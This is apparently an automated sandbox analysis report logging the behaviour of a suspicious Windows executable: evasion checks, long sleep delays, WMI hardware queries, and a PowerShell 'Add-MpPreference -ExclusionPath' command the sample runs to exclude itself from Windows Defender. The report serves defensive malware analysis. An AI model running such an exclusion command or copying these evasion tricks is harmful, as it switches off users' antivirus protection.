                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: QFEWElNtpn.exe PID: 3492, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeMemory allocated: D20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeMemory allocated: 4890000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeMemory allocated: 89E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeMemory allocated: 99E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeMemory allocated: 9BE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeMemory allocated: ABE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeMemory allocated: 1860000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeMemory allocated: 3200000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeMemory allocated: 3030000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6248Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3369Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeWindow / User API: threadDelayed 2609Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeWindow / User API: threadDelayed 5581Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 6880Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5788Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 4876Thread sleep count: 2609 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 4876Thread sleep count: 5581 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -99874s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -99766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -99641s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -99516s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -99403s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -99297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -99188s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -99063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -98938s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -98829s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -98704s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -98577s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -98250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -98139s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -98032s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -97907s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -97797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -97688s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -97563s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -97438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -97313s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -97188s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -97077s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -96969s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -96844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -96735s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -96610s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -96485s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -96360s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -96235s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -96110s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -95985s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -95860s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -95735s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -95610s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -95485s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -95360s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -95235s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exe TID: 5812Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 99874Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 99766Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 99641Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 99516Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 99403Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 99297Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 99188Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 99063Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 98938Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 98829Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 98704Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 98577Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 98250Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 98139Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 98032Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 97907Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 97797Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 97688Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 97563Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 97438Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 97313Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 97188Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 97077Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 96969Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 96844Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 96735Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 96610Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 96485Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 96360Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 96235Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 96110Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 95985Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 95860Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 95735Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 95610Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 95485Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 95360Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 95235Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: QFEWElNtpn.exe, 00000007.00000002.3359371728.0000000001620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe"
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess created: C:\Users\user\Desktop\QFEWElNtpn.exe "C:\Users\user\Desktop\QFEWElNtpn.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess created: C:\Users\user\Desktop\QFEWElNtpn.exe "C:\Users\user\Desktop\QFEWElNtpn.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess created: C:\Users\user\Desktop\QFEWElNtpn.exe "C:\Users\user\Desktop\QFEWElNtpn.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeQueries volume information: C:\Users\user\Desktop\QFEWElNtpn.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
